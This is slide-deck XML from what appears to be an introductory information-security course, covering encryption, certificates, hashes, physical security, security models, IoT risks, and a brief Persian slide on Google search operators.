          <p:cNvPr id="714" name="Google Shape;714;p116"/>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Transposition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Substitution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Rotation = Caesar (say rot13). Breaks via distribution</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Rotation with a key (say Vigenere grid)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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pic>
        <p:nvPicPr>
          <p:cNvPr id="715" name="Google Shape;715;p116"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5189825" y="1941050"/>
            <a:ext cx="2453325" cy="24814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9" name="Shape 719"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="720" name="Google Shape;720;p117"/>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Symetric Key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> Encryption</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="721" name="Google Shape;721;p117"/>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Same key is used for Encryption / Decryption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Block cipher (block) vs Stream cipher (byte for byte)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Diffie-Hellman </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>let's</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parties to exchange keys without exchanging keys! (PSK)</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DES (Data Encryption Standard). Based on Lucifer, 1970s Block cipher, with 56 bit key with 64 bit blocks. 3DES uses 3 keys, 3 times :) better while waiting for the new algorithms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AES (Advanced Encryption Standard) based on Rijndael. Variable key length (128, 192, 256) for 128bit blocks.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But algorithm is only one parts, we need other parts too, like DH. Check `sslscan` on google.com and note that it even supports DES-CBC3-SHA (Cipher block chaining is kind of XORing each block with the previous one).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AES is still considered secure and attacker needs side channel attacks to break it. </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="722" name="Google Shape;722;p117"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="886875" y="1302350"/>
            <a:ext cx="2148500" cy="33445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Google Shape;727;p118"/>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As</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ymetric Key Encryption</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="728" name="Google Shape;728;p118"/>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Public &amp; Private (Secret) keys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Rivest-Shamir-Adleman (RSA) based on 2 very large prime numbers (1K, 2K &amp; 4K keys)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Problems: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Needs more computing power</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Overhead, everyone needs to have a key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Systems use Hybrid cryptosystems: Encrypt session key with the public key of the server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Non-Repudiation (comes from the private key!)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Elliptic Curve Cryptography: Not only difficult (power consuming) but also infeasible. Much smaller key size.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="729" name="Google Shape;729;p118"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="493363" y="1517000"/>
            <a:ext cx="3079175" cy="307917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3" name="Shape 733"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="734" name="Google Shape;734;p119"/>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Certificate Authorities</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="735" name="Google Shape;735;p119"/>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Certificates are data structures that stores keys (X.509)</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CA is a repo of certificates: collects data and issues a certificate. CA and its systems are called Public Key Infra (PKI)</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Anyone can create certificates but if you want it to be on your servers and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>recognized</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by others, you need to sign it by a CA (Trusted 3rd Party)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Only the owner will get the private key but </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>everyone</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can check the public key.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Keys have fingerprints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Generating self signed keys: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openssl req -x509 -newkey rsa:4096 -keyout key.pem</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Openssl x509 -in key.pem -text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PGP</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Instead of CA, they use web of trust</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 upload mine, they someone knows me and she checks my fingerprint and signs my public key. So her friends will know me :)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Not that good for servers but enough for emailing people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Secure/Multipurpose Internet Mail Exchange (S/MIME)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Another protocol for sending / signing emails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Part of mail exchange progoram</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X.509 on active directory</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>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9" name="Shape 739"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="740" name="Google Shape;740;p12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Cryptographic Hashes</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="741" name="Google Shape;741;p120"/>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Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; Verification &amp; Integrity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Message Authentication Code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Oneway, Easy to check, Brute force is difficult, deterministic, collision resistance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MD5 (32HEX character = 128 bit)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SHA1, 2, 3 (224, 256, 384 and 512 bits). </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D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p121"/>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Physical Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="747" name="Google Shape;747;p121"/>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Physical is IMPORTANT!</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="748" name="Google Shape;748;p121"/>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2" name="Shape 752"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753" name="Google Shape;753;p122"/>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Physical Security</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="754" name="Google Shape;754;p122"/>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Simple Controls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Passwords, screen savers, lock screens, warning messages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Multi Factor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Auth: HAK (Have, Are, Know)</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Encryption (mobile devices)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Data Storage security and backups</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Full</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Incremental (from previous)</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Differential (from last full)</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Wiping drives (DoD suggest 7 writes), Zeroization, Degaussing (magnets)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Non-Repudiation: IT WAS YOU!</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Securing physical area</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Not only hackers and .. but rain and flood and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Know about lockpicking attacks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RFID cards &amp; Biometrics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Controlled Entry (specially server rooms)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Secure laptops and cases and servers physically</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Disable usb , drives,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Separate internet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Education and awareness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Defense in Depth: delay the attacker: layer by layer. On physical they suggest 3 layers: Perimeter, Exterior, Interior</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>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8" name="Shape 758"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="759" name="Google Shape;759;p123"/>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Security Architecture and Design</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="Google Shape;760;p123"/>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There are protocols and standards</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Design concepts</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Application security</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Disaster Recovery Plans &amp; Business Continuity </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="761" name="Google Shape;761;p123"/>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5" name="Shape 765"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="766" name="Google Shape;766;p124"/>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Security Architecture and Design</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="767" name="Google Shape;767;p124"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4066575" y="235075"/>
            <a:ext cx="4699800" cy="464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Not data is created equal! Plan for different levels, in governments: Top Secret, Secret, Confidential, Restricted, Official, Unclassified. In companies: Restricted, Private, Public</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Security Models: who can perform what action on what data</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State Machine. Very abstract. Evaluate when the overall state is unsecure</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Biba: 1975, Kenneth Biba. Mainly about data integrity. Both data and people do have classification levels so people with access still need authorization to modify data.</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Bell-LaPadula. Military and gov. Mainly about confidentiality. System can only be in secure states. </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Clark-Wilson Integrity Model. Does not rely on state machines. No object and subject. Focus on consistency of data. Only allow access through known programs.</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Classifications change, and they have expenses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Conflict between security and business (CIA)</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Separation of duties: Two man control, rotation, mandatory vacation. Change control.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Logging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How we handle Risks or Breaches. </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Quantifying Risk: Vulnerability -&gt; Threat -&gt; Risk -&gt; Loss</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A security control is a means of avoiding, detecting, counteracting, or minimizing security risk</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National Institute of Standards and Tech (NIST) guidelines</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phases: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identify, Protect, Detect, Respond, and Recover</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pic>
        <p:nvPicPr>
          <p:cNvPr id="768" name="Google Shape;768;p124"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="663338" y="1615749"/>
            <a:ext cx="2739225" cy="2577750"/>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Google Shape;773;p12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Application Architecture</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="774" name="Google Shape;774;p125"/>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Systems are becoming complex: many system in and out of the company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N-tier (like Model-View-Controller or Presentation-Application-Business-Data_Access)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Service Oriented Arch. Rather than thinking about applications from end to end (user to data store), it looks at the different functions needed to make applications function. So programmers will have access only to REST or RPC. Also containers.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Cloud Based. Will provide only calls to programmers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="160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Centralized Access Management (LDAP, RADIUS, Diameter, TACACS, AAA)</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SSO (Kerberos)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VPNs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="775" name="Google Shape;775;p125"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="319925" y="1843825"/>
            <a:ext cx="3430650" cy="27043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هک با گوگل</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p27"/>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هک گوگل؟‌ یا هک با گوگل؟</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>سرچ معمول</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>سرچ پیشرفته</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>+ - “</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cache, define, info, related, intitle, inurl</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>آدرس های خاص! هک مستقیم در گوگل هکینگ دیتابیس</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="160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9" name="Shape 779"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="780" name="Google Shape;780;p126"/>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IoT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="781" name="Google Shape;781;p126"/>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More and more in this world</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Cameras, sensors, monitors, sensors, .. a smart what? Fridge, toilet, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>coffee</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> maker, ...</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Controlled from cloud / apps… </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Higher attack surface</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Is it </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>encrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>? Is it physically secured? Theft!</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Used at botnet, is it updatable? Is it updated?</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>APIs</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>And they are controlling important things! And gather a lot of info!</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Be careful when putting them on your network</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>SHODAN. Do not use defaults</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="782" name="Google Shape;782;p126"/>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127"/>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Continue Learning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788" name="Google Shape;788;p127"/>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OWASP</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>SANS.org</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
